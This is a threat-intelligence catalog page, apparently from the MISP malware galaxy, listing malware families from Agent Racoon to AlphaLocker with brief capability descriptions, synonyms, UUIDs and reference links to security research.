- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf - webarchive
- https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat - webarchive
- https://docs.broadcom.com/doc/waterbug-attack-group - webarchive
- https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf - webarchive
- https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d - webarchive
- https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4 - webarchive
- https://artemonsecurity.com/snake_whitepaper.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified - webarchive
- https://unit42.paloaltonetworks.com/ironnetinjector/ - webarchive
- http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/ - webarchive
- https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Agent Racoon
Agent Racoon is a .NET-based backdoor malware that leverages DNS for covert C2 communication, employing randomized subdomains and Punycode encoding to evade detection. It features encrypted communication using a unique key per sample, supports remote command execution, and facilitates file transfers. Despite lacking an inherent persistence mechanism, it relies on external methods like scheduled tasks for execution. The malware, active since at least 2020, has targeted organizations in the U.S., Middle East, and Africa, including non-profits and government sectors. It disguises itself as legitimate binaries such as Google Update and MS OneDrive Updater, using obfuscation techniques like Base64 encoding and timestamp modifications to avoid detection.
Internal MISP references
UUID f3dde421-0f6b-4a2e-b591-64820169ef1a
which can be used as unique global reference for Agent Racoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Agent Tesla
A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Agent Tesla.
Known Synonyms |
---|
AgenTesla |
AgentTesla |
Negasteal |
Internal MISP references
UUID b88e29cf-79d9-42bc-b369-0383b5e04380
which can be used as unique global reference for Agent Tesla
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://www.inde.nz/blog/inside-agenttesla - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/ - webarchive
- https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla - webarchive
- https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/ - webarchive
- https://www.bitsight.com/blog/data-insights-agenttesla-and-originlogger-victims - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/ - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4 - webarchive
- https://www.telsy.com/download/4832/ - webarchive
- https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/ - webarchive
- https://www.youtube.com/watch?v=Q9_1xNbVQPY - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/ - webarchive
- https://isc.sans.edu/diary/rss/28190 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware - webarchive
- https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf - webarchive
- https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir - webarchive
- https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine - webarchive
- https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/ - webarchive
- https://isc.sans.edu/diary/27666 - webarchive
- https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware - webarchive
- https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord? - webarchive
- https://malwarebookreports.com/agent-teslaggah/ - webarchive
- https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/ - webarchive
- https://isc.sans.edu/diary/28202 - webarchive
- https://viuleeenz.github.io/posts/2023/08/agent-tesla-building-an-effective-decryptor/ - webarchive
- https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant - webarchive
- https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html - webarchive
- https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/ - webarchive
- https://guillaumeorlando.github.io/AgentTesla - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1 - webarchive
- https://blog.minerva-labs.com/preventing-agenttesla - webarchive
- https://cert.gov.ua/article/861292 - webarchive
- https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Agent%20Tesla/Agent%20Tesla%20Technical%20Analysis%20Report.pdf - webarchive
- https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html - webarchive
- https://blog.talosintelligence.com/ipfs-abuse/ - webarchive
- https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354 - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/ - webarchive
- https://inquest.net/blog/2021/11/02/adults-only-malware-lures - webarchive
- https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-f1a988cfd137 - webarchive
- https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/ - webarchive
- https://isc.sans.edu/diary/rss/27092 - webarchive
- https://lab52.io/blog/a-twisted-malware-infection-chain/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry - webarchive
- https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf - webarchive
- https://stairwell.com/resources/proactive-response-anydesk-any-breach/ - webarchive
- https://www.infinitumit.com.tr/agent-tesla-malware-raporu/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://asec.ahnlab.com/ko/29133/ - webarchive
- https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/ - webarchive
- https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/ - webarchive
- https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia/ - webarchive
- https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://medium.com/@b.magnezi/malware-analysis-agenttesla-2af3d73a7825 - webarchive
- https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr - webarchive
- https://youtu.be/hxaeWyK8gMI - webarchive
- https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/ - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://blog.netlab.360.com/purecrypter - webarchive
- https://guillaumeorlando.github.io/GorgonInfectionchain - webarchive
- https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html - webarchive
- https://youtu.be/QQuRp7Qiuzg - webarchive
- https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting - webarchive
- http://ropgadget.com/posts/originlogger.html - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://community.riskiq.com/article/56e28880 - webarchive
- https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns - webarchive
- https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/ - webarchive
- https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf - webarchive
- https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware - webarchive
- https://youtu.be/BM38OshcozE - webarchive
- https://unit42.paloaltonetworks.com/originlogger/ - webarchive
- https://twitter.com/MsftSecIntel/status/1392219299696152578 - webarchive
- https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/ - webarchive
- https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - webarchive
- https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/ - webarchive
- https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/ - webarchive
- https://malwatch.github.io/posts/agent-tesla-malware-analysis/ - webarchive
- https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ - webarchive
- https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/ - webarchive
- https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/ - webarchive
- https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/ - webarchive
- https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/ - webarchive
- https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/ - webarchive
- https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/ - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://securelist.com/agent-tesla-malicious-spam-campaign/107478/ - webarchive
- https://community.riskiq.com/article/40000d46 - webarchive
- http://blog.nsfocus.net/sweed-611/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220307_002893.html - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla - webarchive
- https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire - webarchive
- https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update - webarchive
- https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/ - webarchive
- https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/ - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf - webarchive
- https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf - webarchive
- https://www.bitsight.com/blog/exfiltration-over-telegram-bots-skidding-infostealer-logs - webarchive
- https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/ - webarchive
- https://blog.malwarelab.pl/posts/basfu_aggah/ - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://isc.sans.edu/diary/27088 - webarchive
- https://www.secureworks.com/research/darktortilla-malware-analysis - webarchive
- https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/ - webarchive
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ - webarchive
- https://youtu.be/7AifHTCldZI - webarchive
- https://menshaway.blogspot.com/2021/04/agenttesla-malware.html - webarchive
- https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/ - webarchive
- https://cyber-forensics.blog/2024/05/06/formbook-analysis/ - webarchive
- https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware - webarchive
- https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads - webarchive
- https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ - webarchive
- https://community.riskiq.com/article/6337984e - webarchive
- http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ - webarchive
- https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AgfSpy
The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to those of dneSpy, except that each backdoor uses a different C&C server and different message formats in its exchanges.
Internal MISP references
UUID 405fe149-1454-4e8c-a4a3-d56e0c5f62d7
which can be used as unique global reference for AgfSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ahtapot
Internal MISP references
UUID 549b23b1-6f53-494e-a302-1d00aa71043b
which can be used as unique global reference for Ahtapot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Akira (Windows)
Internal MISP references
UUID 834635f7-fb0f-472c-913e-fb112ae29fdc
which can be used as unique global reference for Akira (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.akira - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/11/automatic-disruption-of-human-operated-attacks-through-containment-of-compromised-user-accounts/ - webarchive
- https://arcticwolf.com/resources/blog/arctic-wolf-labs-observes-increased-fog-and-akira-ransomware-activity-linked-to-sonicwall-ssl-vpn/ - webarchive
- https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-and-royal-ransomware/ - webarchive
- https://www.intrinsec.com/akira_ransomware/ - webarchive
- https://cybercx.com.au/blog/akira-ransomware/ - webarchive
- https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/ - webarchive
- https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape - webarchive
- https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/ - webarchive
- https://securelist.com/crimeware-report-fakesg-akira-amos/111483/ - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques - webarchive
- https://www.loginsoft.com/post/akira-ransomware-the-evolution-of-a-major-threat - webarchive
- https://www.bankinfosecurity.com/blogs/akira-ransomware-apparently-in-decline-but-still-threat-p-3480 - webarchive
- https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/ - webarchive
- https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Ransomware/Akira/Akira-The_old_new_style_crime_EN_Aaron_Jornet.pdf - webarchive
- https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/ - webarchive
- https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html - webarchive
- https://stairwell.com/resources/akira-pulling-on-the-chains-of-ransomware/ - webarchive
- https://twitter.com/MalGamy12/status/1651972583615602694 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Albaniiutas
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Albaniiutas.
Known Synonyms |
---|
BlueTraveller |
Internal MISP references
UUID dff7e10c-41ca-481d-8003-73169803272d
which can be used as unique global reference for Albaniiutas
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://blog.group-ib.com/task - webarchive
- https://www.group-ib.com/blog/task/ - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aldibot
According to the Trend Micro Encyclopedia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, the instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.
This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.
This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.
This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.
This backdoor executes commands from a remote malicious user, effectively compromising the affected system.
Internal MISP references
UUID 43ec8adc-0658-4765-be20-f22679097fab
which can be used as unique global reference for Aldibot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alfonso Stealer
Internal MISP references
UUID a76874b3-12d0-4dec-9813-01819e6b6d49
which can be used as unique global reference for Alfonso Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Project Alice
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Project Alice.
Known Synonyms |
---|
AliceATM |
PrAlice |
Internal MISP references
UUID 41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca
which can be used as unique global reference for Project Alice
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://www.symantec.com/security-center/writeup/2016-122104-0203-99 - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alina POS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alina POS.
Known Synonyms |
---|
alina_eagle |
alina_spark |
katrina |
Internal MISP references
UUID 27d90cd6-095a-4c28-a6f2-d1b47eae4f70
which can be used as unique global reference for Alina POS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos - webarchive
- https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/ - webarchive
- http://www.xylibox.com/2013/02/alina-34-pos-malware.html - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AllaKore
AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.
Internal MISP references
UUID fb1c6035-42ee-403c-a2ae-a53f7ab2de00
which can be used as unique global reference for AllaKore
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d - webarchive
- https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388 - webarchive
- https://github.com/Anderson-D/AllaKore - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf - webarchive
- https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/ - webarchive
- https://threatmon.io/the-anatomy-of-a-sidecopy-attack-from-rar-exploits-to-allakore-rat/ - webarchive
- https://twitter.com/_re_fox/status/1212070711206064131 - webarchive
- https://www.team-cymru.com/post/allakore-d-the-sidecopy-train - webarchive
- https://blog.talosintelligence.com/2021/07/sidecopy.html - webarchive
- https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479 - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt - webarchive
- https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Allaple
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Allaple.
Known Synonyms |
---|
Starman |
Internal MISP references
UUID 6aabb492-e282-40fb-a840-fe4e643ec094
which can be used as unique global reference for Allaple
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AllcomeClipper
Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer space where copied data is stored) and substitute it with other data. This attack mainly targets users active in the cryptocurrency sector.
Internal MISP references
UUID 43ca1245-a5e0-4b44-9892-cf317170c7b8
which can be used as unique global reference for AllcomeClipper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Almanahe
Internal MISP references
UUID 352f79b1-6862-4164-afa3-a1d787c40ec1
which can be used as unique global reference for Almanahe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alma Communicator
Internal MISP references
UUID a0881a0c-e677-495b-b475-290af09bb716
which can be used as unique global reference for Alma Communicator
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AlmaLocker
Internal MISP references
UUID b5138914-6c2b-4c8e-b182-d94973fe5a6b
which can be used as unique global reference for AlmaLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AlmondRAT
AlmondRAT is a .NET Remote Access Trojan deployed by the Bitter APT group. It is capable of collecting system information, modifying and exfiltrating data and allows for remote command execution.
Internal MISP references
UUID c5fa22fd-5869-4a4d-b5fc-c3be18255d2e
which can be used as unique global reference for AlmondRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ALPC Local PrivEsc
Internal MISP references
UUID 86517f1a-6e67-47ba-95dd-84b3125ad983
which can be used as unique global reference for ALPC Local PrivEsc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alphabet Ransomware
The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready, it does not affect any user files.
The virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.
Internal MISP references
UUID 5060756f-8385-465d-a7dd-7bf09a54da92
which can be used as unique global reference for Alphabet Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AlphaLocker
AlphaLocker is a new form of ransomware built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost: the ransomware can be purchased for just $65 in bitcoin.
AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author is said to be paying a great deal of attention to updating the ransomware with new features so that it always stays ahead of antivirus engines and evades detection.
AlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key on the server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, then encrypts this key with the public RSA key and sends it to the C&C server.
To decrypt their files, users have to get ahold of the private RSA key, which unlocks the AES keys protecting the encrypted files on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.
Internal MISP references
UUID c1b9e8c5-9283-4dbe-af10-45956a446fb7
